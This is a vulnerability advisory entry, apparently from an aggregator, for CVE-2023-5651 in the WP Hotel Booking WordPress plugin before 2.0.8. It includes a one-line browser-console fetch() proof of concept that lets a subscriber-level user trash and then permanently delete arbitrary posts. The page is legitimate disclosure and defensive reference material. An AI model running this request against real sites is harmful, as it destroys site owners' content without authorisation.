Lucene search
Krzysztof Zając (CERT PL)WPEX-ID:A365C050-96AE-4266-AA87-850EE259EE2CHistoryOct 26, 2023 - 12:00 a.m.
WP Hotel Booking < 2.0.8 - Subscriber+ Arbitrary Post Deletion
2023-10-2600:00:00
Krzysztof Zając (CERT PL)
53
arbitrary post deletion
developer console
subscriber user
web browser
ajax request
exploit
Description The plugin does not have authorisation and CSRF checks, as well as does not ensure that the package to be deleted is a package, allowing any authenticated users, such as subscriber to delete arbitrary posts
Run the below command in the developer console of the web browser while being on the blog as a subscriber user. This will put the post with ID 1 in the trash. Run it again to then delete the post
fetch("/wp-admin/admin-ajax.php", {"headers": {"content-type": "application/x-www-form-urlencoded; charset=UTF-8"},"body": 'action=tp_extra_package_remove&package_id=1',"method": "POST"});Related
wpvulndb
wpvulndb
WP Hotel Booking < 2.0.8 - Subscriber+ Arbitrary Post Deletion
2023-10-26 00:00:00
prion
prion
Cross site request forgery (csrf)
2023-11-20 19:15:00
cvelist
cvelist
CVE-2023-5651 WP Hotel Booking < 2.0.8 - Subscriber+ Arbitrary Post Deletion
2023-11-20 18:55:08
cve
cve
CVE-2023-5651
2023-11-20 19:15:09
nvd
nvd
CVE-2023-5651
2023-11-20 19:15:09
AI Score
7.2
Confidence
Low
EPSS
0
Percentile
13.3%
Related for WPEX-ID:A365C050-96AE-4266-AA87-850EE259EE2C